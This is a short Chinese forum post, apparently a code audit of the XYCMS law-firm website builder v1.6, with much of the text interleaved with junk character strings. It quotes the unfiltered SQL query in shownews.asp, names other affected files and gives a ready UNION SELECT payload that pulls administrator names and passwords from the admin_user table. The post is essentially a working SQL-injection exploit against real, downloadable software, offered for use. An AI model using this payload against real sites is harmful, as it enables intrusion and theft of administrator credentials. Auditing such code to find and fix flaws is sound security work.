前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似) T. z9 k T8 o8 ]6 @' E: f
! U5 ?3 A3 a1 v' y( G% Q
淫荡分割线
2 |# ]8 I# T3 x, U+ o8 d. L--------------------------------------------------------1 S% \" }) P7 P$ Y5 F2 T/ _
1 ]/ F1 {# J: j
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
' k4 y+ d+ g) j3 a源码地址:http://down.chinaz.com/soft/29233.htm
; u* r1 [) _+ L {/ D) ^% a2 ]! Q
9 i3 s8 \6 w' z. ]漏洞文件:shownews.asp i3 U0 t& M: b3 D/ R1 H
漏洞代码:7-13行7 T; a" S) r x+ K
/ ~* d$ g5 r2 ?0 ?. W, U
# ?0 Y$ R6 H; ?" U; q \<% , I5 B- \1 p! H- Q$ p
id=request.QueryString("id")0 l; Y. \9 ` J8 l/ g! V. w
+ B4 E( Q4 v: M) i) D( Q; eset snews=server.createobject("adodb.recordset") % [" T6 |9 { ^" l
exec="select * from [news] where id="&id
( @9 X. ?1 U& r6 }snews.open exec,conn,1,1
- y2 P- K8 q& d- d1 `%>
! `! y' }' G! \4 o4 |
" m9 Z$ k& o/ [3 d' P2 i
2 \: a Z% e4 F' T. b什么过滤都没有 直造成注入
8 I' i* G) P# ^ $ l% Y5 `( \3 W* a
注入点:http://127.0.0.1:99/shownews.asp?id=xx; m0 w' s+ S* f5 m! g
- p& J% h$ |' C9 u1 O+ w$ ]# P其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找( Z0 I* z( P6 | W" Q
2 j, d/ b1 }: W
, P$ V: a. Y8 a9 j4 `exp: union select 1,admin,password,4,5,7 from admin_user
$ _" N4 ?6 k6 X* `) }8 V
6 G+ ^ x9 Q; V |